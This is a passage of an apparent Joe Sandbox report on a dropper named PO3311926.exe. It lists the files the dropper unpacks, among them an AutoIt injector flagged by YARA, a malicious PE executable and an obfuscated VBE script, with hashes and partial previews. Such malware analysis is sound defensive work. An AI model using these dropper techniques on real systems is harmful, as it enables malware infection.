Yara Hits:	Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\nngqrvwq.xl, Author: Joe Security
Preview:	..;...wY.d.p#...4-...j-1..:5X..c5.`....#.c.s......6VJ....F..L. K[..R.g......*../.....I....z...;..q..o..N...9.s..\..+.C.JN&...^.Q~n$g...\|[.o.Y`. '.6?i..m...T_.....4Ca..rf./K.......D.<.O.Y..H".H.....[.9<.....K#FU<0..K....5.4.w.Y.7.3.4.....x.7.q.5.T.0.5.1.4.g.s.2.D.v.3.3.x.v.8.1.2.9.w.g.7.q.8.8.F.i.2.5.P.6.g.4.t.5.B.j.s.8.7.6.8.....G..I.3...g.F^;M,.6f..F....<S.Z.........'....0..).4..t..:D"{..'l..!.p...z.GVD.~...BPgB.)g.$.........W....'Z.q%;..i....+..\{W..e.f...HB..?.!y....A^8..gX..E}..a...K.Ao.Kp.s.A.....5.5.x.f.1.6.1.0.T.U.5.0.B.2.8.S.G.1.6.8.0.k.A.l.3.0.0.P.Y.f.j.d.8.3.7.....Z.c.8.V.2.6.4.o.5.1.H.5.....2.b.2.R.4.9.7.2.6.Q.V.U.1.7.6.0.H.G.2.F.7.u.f.4.p.C.X.5.7.3.9.6.7.t......%.Rd.......4}~...:.[.T.q...."7.H=z..........C.m.........#kQD.RE{.6.Wbv.....$...].../....#..1...ZW...?.J.D...O=.iy.0L....1...I.Y..84dm.......\|4bc9..a...t.C;;.G.GP.-.=8.r.......}...-..8.......sW..F....V8.....9'F..#.d.u....J..>3f.T.....O...XQ.Q.....`...0......y4..._d7._.u...+.Y.....p.;

C:\Users\user\AppData\Local\Temp\RarSFX0\oahtefaij.docx

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	541
Entropy (8bit):	5.500713602675913
Encrypted:	false
SSDEEP:	12:L2PI9CSDd6C6hRVZfqNCaqJ8fIHuCk89QpKoWVkjPc:LH9fDd61XICaqQv8h1L
MD5:	C19B7228B00C62EC73D9D397A8D5411C
SHA1:	2602C88A1B59809A3100FAB34B09ABD8AA49357E
SHA-256:	A43EF991601F3F4BB4BCCCECC42F7EE138E3ADB9E1AB8986D15AE5FFE9CFCACA
SHA-512:	87860E453841667CE5FDE333B0D08E1AFBE8335BEA1551B8A77D4EAE4B5C467F43D74F08C96F95BD4893AEF029CA980A46EC031316D565E98F2434D69AF757E7
Malicious:	false
Preview:	3M8M129O40l96BLx57e7yT62w9O91i..TreeViewConstants BorderConstants..r6A4x792ipG20564Y0278dSU41dP6ty16Mo71X71So7e4XYe2yqLL27n1810H31L20wv2l1a3880bSsgMh32OBBmEy2xs0..DateTimeConstants FontConstants..0h11d68252o149HV81gXG4aKAt272YA96s06VX8fFN33988..StructureConstants GuiDateTimePicker..83Kd31EQ8M72d55lt0FCD4G07K54hIiW3xI92855R8IoT4Q292Yro5sm5aI43oO75874hlU05r517ibw5b9tY8465N9T861Pj3..FontConstants FontConstants..3O9675zw751VS30D7X5y8pq1p393ct0302N6e0r4tL6YpS6Eo392757S97422723Hu1a5785R23874o9kFMMY0K6oc..GuiDateTimePicker TreeViewConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\oewmscssx.xl

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	596
Entropy (8bit):	5.463054222617093
Encrypted:	false
SSDEEP:	12:rXyQ220lRsKYT7N+cMoaZt9MjVueBP0yMA6cFKwfCcK6vsRc:zyBPMF+HZt9MjQemZA6ceyuc
MD5:	932B923E6BBACB25F75103B5E1340469
SHA1:	8A7933302671AC0AD727408DF4C9E233F0EAC1C0
SHA-256:	AA374071E60CB09D2D90D2ABAF4707D93C1D4A0EE8DADE5706326F0C934EA43A
SHA-512:	6848C73602601072D9017595EB43AB9BBADAA02B9C3B00945A2A258DFC24532E2B93664F0852F989DAFBA5ABE38922847BFAB3D8E4A6A4E234531D4C9E3813C0
Malicious:	false
Preview:	SV9v9d0s4..DateTimeConstants ToolbarConstants..X3Tt32i1e7i8T0845..ColorConstants ComboConstants..83y46jxPV37DycE0ae9saH1c1Zkb98o4c8Oqq8791x2Cc97DW327pH76vUKNB8X63U90t590Rf52BhQ9k..FileConstants ButtonConstants..5YG9j3Gbq5dg3U53x7v54VAAl299ZHVEfl..FontConstants FontConstants..4M6OuXQ5A56gE50p9CP6ltte675057k..FontConstants TreeViewConstants..cy58f738AF1Yc8iTi304D289BoA17o8LjK7q7827V2F4J112..ToolTipConstants ButtonConstants..7448Tv8T6q342CESw215c48GJIa0Xj7TsJrm5n376E449ZIc17BS5120f305ydF5BPP36fC0I387138z2N512685XO62ayr04O5CJLf97m065979o5mT33B4hKx20vbPjBY1F..ColorConstants StructureConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\oqrcndmig.mp3

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	696
Entropy (8bit):	5.630432220552905
Encrypted:	false
SSDEEP:	12:gVPcM5uRvFd/DSRN+IYjSuJKhMbAVW1FoA4wVivJ:5vFpORN+Ibu2Mbz1GcivJ
MD5:	F1E2E47F76E808957B86AFA2CF191A38
SHA1:	CF80DA736B5C9AF9C4FD745748E891E7F499846E
SHA-256:	D23B2433D0F575D085723B5DE77F691220CF01E451FFD5427151D6EA263B6F31
SHA-512:	4F94C1E289AA86FF93A1E9BF699A1AA0943897760A97B0F56E470864F21769899A08839EE150F2A2C7DDE6B7DB151B164072C56A20596A3B3F0A867DC457149E
Malicious:	false
Preview:	T7P5..TreeViewConstants UpDownConstants..tQeZSI6E083diY86i31e6A0Xb8Kh1UAg2F..FileConstants StructureConstants..OcJo5C3S4FlG3419z771DOiV109m6G2B1B45Z83L8d7gP70P8gb133Dq191ys6Ek6344q34v6eF991K39L55spnWW4LL7PO6B8..StructureConstants ButtonConstants..z2326mjg91c2EQ09Q70tD3T37KQxS0n7hz3Bai59wXd27hE2l10iNDO19V6Ls38RXR6M13Sr4V85SdY0y7i8718741IGfD2sv2X9..ButtonConstants BorderConstants..45719DDXPo12B299Y86G7r5574x76XaC908K74Z71g3VNGw0BVf4MI25MA47..GuiDateTimePicker DateTimeConstants..1L7A24L123zi1BUv0b3Qu1UG7c901MQ53Eel83pu0E5PHembm1nFp7c55vgwh0566udk2cggPm0m2Z9WZD7ymDQyplxz5td456dE33gfc83J98cTe1k31cM032F9fB3187L6E0Q97f1ie8A059f2k7rq9fX2472a25l1fEPVPxm7565M26m0n0x..ComboConstants FontConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\pxxdqattof.bin

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	552
Entropy (8bit):	5.539800752986542
Encrypted:	false
SSDEEP:	6:74Sl/QRzH7gioF0Fzf+7JwGkj9bW/WP+KheIRvTLbXVT6hZN3AaBSccrZ1UcTine:rlYBZC0Fy7JwBogJUlBPiZpQFxuIf3I7
MD5:	175F423AC70DCBEB0A79D89A979A9A7D
SHA1:	551A20696979D9FDA40AEAC28F5696FCE888B439
SHA-256:	0D35CCFB2FE98D9437800DD49B4F61F38B349911434839387E14FF8A644A013E
SHA-512:	14378450DFE9BE761B74F7A9DD87875DFCF39DC1981A82A75F3F138B6102AC3410146995404CD3DA8730F9A03A9F1735962352324B02E282A768F71C8E75A5DF
Malicious:	false
Preview:	Eqgzy74gIJc49677iH6v8v7177u4a7J6J9jN13wtov22xk14OWLO24014O82P0FYtEE8Eq636l107N8SA75536Sx7x5MOFfW92B13e5nInN86i7Th3u6Gr5B27..ToolbarConstants ToolbarConstants..13tJ55E1RdMb32B22043eoN..GuiDateTimePicker StructureConstants..2W95X833m4AJzf3aq048857Aw75tL87E84xJ6x839x80h7ay5z88W7rLC9Htw2e4437KIVH408V6z6l5kot0qz19x18Se63f8k63i..ButtonConstants TreeViewConstants..YN9y3sl9S8ee5658IO6O56PCa67yRX1L042163s644jvZ814BI7Fw0C6CoT51508b84iKJoPx37Tr308..StructureConstants BorderConstants..7mj1d7197iT42lQOX5634PFs7DeU1Rr167H97EY..FileConstants DateTimeConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\qcndm.jpg

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	503
Entropy (8bit):	5.50546117774599
Encrypted:	false
SSDEEP:	12:9uLnyutiuEqa6rZqjgn3DNAXBEsQ0zz0sS0:ELn/TZ/pdJAYsS0
MD5:	B288D964AD7DA5A36163B8668F5B732F
SHA1:	524658075F06DDD1ED23F6FBE27F949BE2C03F12
SHA-256:	A63DD757096ADA2F9B78413839CB25F3F85B794AB07A312D34CD995177E8F4D8
SHA-512:	945FE2A7F82C9FEAB0CFBD03C3701AFA533FAAC44DFD6E2F084D71260BAA7B733F9051E0043F57A0E5009E8DC36FCC12885237FC19E4A7CBF2909BBD6FF4BDAC
Malicious:	false
Preview:	9JUDF1FaAvn102F1389315S3532793k2V39S5arW80M7ub0Q1W542k2H32zwGRa110H1V693357Y17B40D4M88487e3J395M835Rhv8KJO6lqvd4KZ40P8yr9823x7d2682oC5J252..ColorConstants BorderConstants..iOw4L811r5uP7CGNG81fUH5j34nZ1Ee879z8Mxd850Z0Ou6..ColorConstants DateTimeConstants..3XW576q54Vr75va0Eti353J77UmI58P78TS6Cw582d936UrAR2b8Q06rf53e386585u1961B063547u2r0421j193W7G70YEyA034..UpDownConstants ToolbarConstants..TAWo8rSjF86W345125OI02V1OPI7CEkg1VIa495dZ3bExkjU9c4jki65y05Se11F58192PNgr72o..ButtonConstants BorderConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\qjjfc.txt

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	557
Entropy (8bit):	5.532576183180574
Encrypted:	false
SSDEEP:	12:rmMn4s5dOmO1HwekWpSBPJIPeqj+ZtcugZ:CqcmOSJVqCZuugZ
MD5:	70C089B1F601043079566273D1443E4A
SHA1:	F82D75F5767E179D98F89073F8E8FD4EEEC87784
SHA-256:	C4764BA3715EA3C63D4ABE1C81E7EF224BB892E5E022059D91A1ABA1FFC492D2
SHA-512:	6AED8EFE3D299AC85896FF909E1E6511BEA94E88DEE5EF9E4FDEBA5F89EC0B0B09C4E91458EA653AA6DF4AAB31CBBEDE01DEF2082E0E29DF87ABF41A7A56DE4D
Malicious:	false
Preview:	9cQ76eo52iT7a94L94qocZ1tS6736hW0786E1v3rvL80139u4X9g65gI0En74l3j300UiA57260AG8eX38k8582wpJ..UpDownConstants UpDownConstants..gp92O04zHc3p47DKi4VD58272o6B4g198v68Ss968hQ28Vxz55PCIue7x2456ne0he6563402v5812M2243m8q67g29s9yf340mlqg9ZIkkk99hZ591Jv3V..FileConstants TreeViewConstants..u620aCTX4tEWVy2W46J9g29195l7ZeF6vG8B7..TreeViewConstants UpDownConstants..Ct5608F7GvZLW3r83Q5k8WH1f5946Vh8aJ59yADU..FontConstants DateTimeConstants..3jo0oYPV6X75b3427P335WBULn87yO5lI1J7Fp7WppQx14L1001zh0yH9Q1W73ioig3fxQi1I5aHb6347O4i06K29n7yA451z6..FileConstants FileConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\qxvdwja.txt

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	511
Entropy (8bit):	5.496171918619403
Encrypted:	false
SSDEEP:	6:S9zlrfVPUyT6cWyxNr/62RHG3Taj78tWvRAuZMnK9lrGFnKR1kuuRLuOEbjLWsd:YzhdsDRyxZnVG3a4YvRhZWyUnKcgbt
MD5:	6DD4E526E16732BE3E1E0CAE37165D8B
SHA1:	1D723A8CD43390D8A7B0C7D1AF053C68096E74F0
SHA-256:	B7A0DDA2CFCCDCE692203B51ABA2E781501D7556DEC897728CF15D2E608343E9
SHA-512:	55E3BDE3FCA853A17A322BA2306E527770B3B81BDA105AC0CDD60A6EEFA68C2A11FB48E2BD3B18913612556A3DCF8B7A24C5E9890217CED389AE05FABF446FB4
Malicious:	false
Preview:	5bLv9i4DV7h13F35Q1lHUebQt9267B3936c74NGnnj1..FileConstants StructureConstants..6tTTgL0P..FileConstants BorderConstants..30RAwPp5jv1J45LXd0Y9kEP793dW72530p589J94t0p9Q2J65754v8D38z14KMAyJkfD44Bp..StructureConstants ComboConstants..20t48g0S3tB97168x650H1RNSaQq9f24t3HX08b7e77PCy0vdQ9l5Q1tw6499P22e2MJfqQv3m343E53Dv156307ZdX8V6P1tK6W091SQZ68..ToolTipConstants ComboConstants..jq8895W25Sy4..ComboConstants FontConstants..vK7FjA6Paet73D8SCS9Q7197i5X44w0dg8GrAFuDM9PGB66ZOj2CG11043m..DateTimeConstants ColorConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\rdjajvacb.pdf

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	545
Entropy (8bit):	5.595661006652178
Encrypted:	false
SSDEEP:	12:dPDmE6DUy5UMgwg2SK3nPv1u0rqZpeXuTwAa4KSVv:dd6DUya9aj7rIUXck4K0v
MD5:	2BEDBFB01C22499C8A83EBA40F78F718
SHA1:	152D97D5B14CC835D774C055C5F8979D12EE930B
SHA-256:	652BFDED4DC71C958328FD04B32471A49B363181773047DFD3BD87C7038C653B
SHA-512:	ED2A2C23AD34ED0712035FB5F4B846B9FC23B7C9F306C3974F3A4E7DB33E70D666B41E0865B81EBEC4E92BBFE6599766EEE81792E58BEC32DFB2FFCF2F0DA954
Malicious:	false
Preview:	60UC138F9P29okc5Ec178FHN3Y988w85QWI57L89C2U1K3Wco5646kX5q2tcrPD90813T23q1d8B4SMi69nkK6295F355408z4P591A0EYqV31P575hhxS1F70zos76N92rOqfcSwX3BDEea0y8h1eqN3..ButtonConstants UpDownConstants..19Wy1w376yx0jf4h5k6erqd0648J9ES1..TreeViewConstants DateTimeConstants..3LD2R9jA0X444I2sbRnQsOQ0efuWq95tQGV0WO2994FYeV4e03b395dMMx9H52G6EX8718G193S9HN1r721l00N9F11428839z8476aa7979FU76V5Ly76p2B474T1c221tQ08b5Q99x8653G7gL94oLy06168sKIu8wJJeR860fR129DIaS49f71..ComboConstants BorderConstants..XxG9P36BHf6g9C45E2w7757Q6s43Bx..UpDownConstants GuiDateTimePicker..

C:\Users\user\AppData\Local\Temp\RarSFX0\rskudssahm.mp2

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	521
Entropy (8bit):	5.563439562316828
Encrypted:	false
SSDEEP:	12:DxrEDJK1mHLWAR9R0KnL0omJxCkR8wyjcAcIPrBPJeXWG3Wjn66PeX:2DJK1AFR31YoDkBRApml3WjnpWX
MD5:	1BD2A3469A3BCC3FF9F22BA5671AF005
SHA1:	A0BD6009C9B3F33B2E363C619366F1AC285B3FAB
SHA-256:	B54E514348498E257ACC79B55F2E293EFD16500CDFFCE9EEDEE29A3C9ADC6F4E
SHA-512:	14565C68B8AEAD502796D56492AB58243997AF2F8D6624CB5C418B879EF11A8D30684F0D7549009C7823B31164410BAA331EA889A218FED7ED2A6D1851CF5585
Malicious:	false
Preview:	yCb6bN1L50y48O83Z6KdkW71A23l03Ts3o01hp31Eo6fO5IE4L36690jR4Km69dFu9o04y1548B568x53zNUW3RzE7U72wR713..StructureConstants StructureConstants..7698l55WX8G9UP27D3917681fY50lixT5gO2Kuj2c5Qn52LbrE7SlVQ3Jcr33450i52Srv9Sem9861z..ButtonConstants FontConstants..ws813g4M92v9H7N1fLk132Eto01o7Q50602F6V9Wnb232cNTC90YoS5m463C24WGo3676766S61E167mW7Qqj2H..TreeViewConstants TreeViewConstants..2161Mo7Z0398s83mz4y8UCRJrW8XAT02a3l2hf279338sQ2d2rTCo1BbxZ1TB85397XGll36Bv8Is61qqVa6y01Z4M1p88o6ee939Umo8d4..UpDownConstants DateTimeConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	947288
Entropy (8bit):	6.6296921617529625
Encrypted:	false
SSDEEP:	24576:KYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCMel:K37+KSbq5e1diEnHaCj
MD5:	EEAA0F5D82E56659C80FA84D588BF870
SHA1:	A1AEA1DE9C42E1EF8C186EF6246DD318040E66DE
SHA-256:	3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9
SHA-512:	20B4D8D117419A511CDE61EC37C488FCF86D8D6E9174DA2496CD71843E8C7F0DD5B7707E59E8404018F0C7074FEF610A48F68E274FA250E05AE89E474CEB8247
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26% Antivirus: Virustotal, Detection: 28%, Browse
Joe Sandbox View:	Filename: Vessel Details.exe, Detection: malicious, Browse Filename: PAscChbUto.exe, Detection: malicious, Browse Filename: fGpaopkx0W.exe, Detection: malicious, Browse Filename: Final Shipping Samples and Lables.scr.exe, Detection: malicious, Browse Filename: RFQ_0103.exe, Detection: malicious, Browse Filename: doc2902.exe, Detection: malicious, Browse Filename: doc2902.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@.......................................@...@.......@.........................\|....P.. ............N..X&...0..Pv...........................C..........@............................................text...\|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc... ....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	947288
Entropy (8bit):	6.6296921617529625
Encrypted:	false
SSDEEP:	24576:KYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCMel:K37+KSbq5e1diEnHaCj
MD5:	EEAA0F5D82E56659C80FA84D588BF870
SHA1:	A1AEA1DE9C42E1EF8C186EF6246DD318040E66DE
SHA-256:	3FCE07BD7E220E97A1B141DA155444F95ABA7B5E4325F6A5EDB262C025C1E5A9
SHA-512:	20B4D8D117419A511CDE61EC37C488FCF86D8D6E9174DA2496CD71843E8C7F0DD5B7707E59E8404018F0C7074FEF610A48F68E274FA250E05AE89E474CEB8247
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26% Antivirus: Virustotal, Detection: 28%, Browse
Joe Sandbox View:	Filename: Vessel Details.exe, Detection: malicious, Browse Filename: PAscChbUto.exe, Detection: malicious, Browse Filename: fGpaopkx0W.exe, Detection: malicious, Browse Filename: Final Shipping Samples and Lables.scr.exe, Detection: malicious, Browse Filename: RFQ_0103.exe, Detection: malicious, Browse Filename: doc2902.exe, Detection: malicious, Browse Filename: doc2902.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@.......................................@...@.......@.........................\|....P.. ............N..X&...0..Pv...........................C..........@............................................text...\|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc... ....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RarSFX0\thgwhgvgpb.jpg

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	637
Entropy (8bit):	5.545789512468366
Encrypted:	false
SSDEEP:	12:5O6cf1wX/TV1tcmcRidP6C0R1G+xSJj2E+oOejlJIKY:Qw512liAlG+2j2E+vejcKY
MD5:	40AAAD33EDF75CE37D096903A47E2903
SHA1:	2D9A727395C3AE26789029CDDDB03732BB5497D3
SHA-256:	1E24E240142BD9BC7699B1F623ECBB4AF545AD55B7B97744FDA87CC141417607
SHA-512:	82CE7DC925BEF6ED2ECB8B53F7CAF1D1B70003790630D6B88F58AC7008719F9A74D32B9209A89AA5D5E41473B21E8B2EBF20CD53B1E57161796DF8C5FEA080DE
Malicious:	false
Preview:	7845IEklmAR2i15yP2Vq6r75D7CRq0A9C810Pc4C0Z2p9Cx5H663G..BorderConstants FileConstants..8Qsaz989KY741f4IQPp25k37sWUbow309d23v709a2Y5ROd4533060CG1721o8PU567L74ej00iVk72x918Mn2gm510628Yp8L98t97w353IPY2NW313i9B6SE4201..StructureConstants ColorConstants..1noa90168FL6M90gxYr9y90zS..TreeViewConstants ComboConstants..SN91856K4u46XIqes564406R64d60j7gBv3038F058HYX7I5do11FuW081p1Ztj2DIQg7486UY4qVf3n8RL50k28E304r7M47204e306..ToolTipConstants ComboConstants..97383hP2WB9Z8SQ2l3y668eq762iyx6m218011Z311Bu15hR2R801Fc79H98kdvP44X11bhR7EF07Z0DM5Iuy5g47T97fmEN101umL72Y4s70234y62402874y71jDB066495pOKujP7D670G443K41MTS..ToolbarConstants FileConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	89346
Entropy (8bit):	2.858175113199945
Encrypted:	false
SSDEEP:	192:2LLLLLLLLLLLLLLLLLLLLLLLLLLfnLLLLLLLLLLLLLLLLLLLLLLLLLLQLLLLLLLn:9a7LY1
MD5:	FC246C3144BE92334A3962754FA98065
SHA1:	66034A9C62AF32E7805C9DE03E9B9F1BEAA91F09
SHA-256:	0173BF1ECB32E9357114EF512EE1B9A0DF13D7403B19D0CF85B49F7D7614639C
SHA-512:	28ED1315926B07C83A92EAB743655ED413CF15F23C9F7226CF790E3BFA393CAE11DF9B13C440600F107D23F81F14D76E71C92B730594BAC37134C981EE8F7D03
Malicious:	true
Preview:	..L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.L.e.n.(.3.3.).:.....L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.L.e.n.(.1.8.2.).:.....L.e.n.(.2.9.).:.L.e.n.(.2.9.).:.L.e.n.(.2.9.).:.L.e.n.(.2.9.).:.L.e.n.(.

C:\Users\user\AppData\Local\Temp\RarSFX0\waheeaq.pdf

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	596
Entropy (8bit):	5.497340705166392
Encrypted:	false
SSDEEP:	12:ly9TdpksIk0PKRVtsHmTTSb11q6rtHYRVrpVlRAsJta0:lYTPksEKRTT2R9Y7r7TAia0
MD5:	4AA7FD332BC6C783FF86F34E92A1E9B0
SHA1:	9D71388EE9B51110C59979BB66D2C313ABAFC41B
SHA-256:	2B60A7FEE500564DECB8E12731F7A3CEF572EC9DD9EC27F30880966F5071E098
SHA-512:	E36357D63E3306A9F267C2BD6CFC04CCD68FFA0001E425122839DBF58B2E9B773C20FD0ED2A4C869B9798283219CE417BB1DEA94413C026BD796409ED4003573
Malicious:	false
Preview:	2812Bpxe4Wvtzh53R6I9210Ion765mD61wt63619f4l4Pi356d50o4q3P6F24BGZ9580n7b2Q5298lD6907720..ButtonConstants UpDownConstants..4ZGHuZ103S712JG76ciK1747078Gv4g9u09B278TDHn897Qoz8643l3j500p78ih76f10sJ3Q570xB3KLu32t3tO2CO44Exv5W3ci49Z2u890K442..FileConstants BorderConstants..n0Z2h3pAfS7yWM2ZtA02034Y515Ky42B8G33M074317NTsqPbuc4d8UHh8r9593E85s9PPe3Cq75Q3037T194XO8uBR7tIP426777z5io6L8fgCYc3z336g9dp4eBf470l6098279B4eA..ComboConstants BorderConstants..noXUU17C08o19110m43414BG0mIm1j33N473682KMwS55H08hS3pp5BQ7Oy720h2O55M51fa1Qu4ap2658038jB9VKrGy1j146Q0SKIpEM717oc8LB4me91F..ComboConstants BorderConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\wgsr.msc

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	43916
Entropy (8bit):	5.58333748326412
Encrypted:	false
SSDEEP:	768:5uSt3UMeB2h0U3h9crxHGQSUet4t6dwBaqe1LBBvDIm:5vt3jh0q+fSHttwwqMnD
MD5:	DB23A994A69C590FC859FBB7EEE52728
SHA1:	E12014FCDE1F04F6589C922DA2F92FFA62DD1E8E
SHA-256:	F1057A78A1D8D834C273326A77DC0D29D09A5E8DB616E82053BBB0CB0C8B25F9
SHA-512:	9C40A35C55C638AE1090F107E12DB5423EC3DFA9486F82075FC9FF2F144222C82D20DFC4B5BC8F19661D34FC16C550F31BDFDAF70EDC18ED34414B8E99EE1E22
Malicious:	false
Preview:	06jR3FHUq0ha50H7X5rqrq943fM4..387F3s5nv2IvFY533eZ6p47G3NGs38hu453245159I3mT1vm4N9Xkw6s7..rCHZB3W0757p2D56314X472p019cU6LZhi1HmP5..13JY4pAZtKA6mArLN8NTU479wHOdVa809..Xp09779xz9038wr179CVMNfQ23dbx0LOC52ykY1I309205nR34W2F..31S8rp61NVtS852pm428H97p6J86Q45Ejc8fLhcMx89E0Du09031PMQ22406ERYcn..6N3683216RuA8ue5967Pm59jdWac4Xu6W8g..HKKV0X045hby79EXq834oRdPr1od1e43164c70O33y4Dq20u8n9L129ezS8o29589Y22Y8..1472759q6543QM7gC6T32Q549HqT14m3147Re8Ff5S..zgQgKF8I8Q1vl3f5592B0473q73ZCE795..502E19thKh201815G31N261oA29HddN6kd26oMMN6oFf53qZ9K5EnexkJiVx6..HB5RD692U6559v4Mu8300Dk1FWyME0634n1S5Abp71XxFwYr..4KIf8rA3I06M5F06P7CZ0z4QA75mw4P3J57u7072G1nDeV806vRON70266w2W2Fl2..6L43Z332n36262UxX06O9Z6n9w2aHo3..89FSyxU36340H424n7f103FdMq616X8183n5x871L63D2IABd5Y7WT4aMHI4992341jKR9A70Q33d94o5A25P23w80C14..e8N1ihW2P25dQE085a7DXs747krVQ4V2JI26ex528c06J94dM573248Y5jIfrYA..8622946Fa5783t58p6g9b19uuJE8JJFC24j7ajBUZDt34eGkSs1D972lDt9p6T4..5aB1A6yLSf5BGvKXWBwgJy1MSOqa35O6hcKkK756..42i56q51wa7Df0Ijg97220a65J6z03K..m72k927kD206

C:\Users\user\AppData\Local\Temp\RarSFX0\xinhmbnh.mp2

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	549
Entropy (8bit):	5.451056001588005
Encrypted:	false
SSDEEP:	12:FLe25+BNcOeLkrKy3SiwMHl2s8vo9SY+BPmcLNM:FabcOSGKy3S1MHl2dvGSxBM
MD5:	2098AB9B09F8EF8FDBAE1367325F06CC
SHA1:	878A8A4F2DCD3CD912BC00463B539E3ADB48CAB7
SHA-256:	016B23334F8AE86DF09D213E43C5F35C049EB7547098804E602F622EF8CD40D7
SHA-512:	D4240BF7E709E3A5C95939FD3856FA04E2E35E1BEFDE4EE1C48102DA1208C07ABC08DFD08FC0CC7A6FE7D7D0AD5101171A92857A8182E5CD5EBEFEBA96D288A2
Malicious:	false
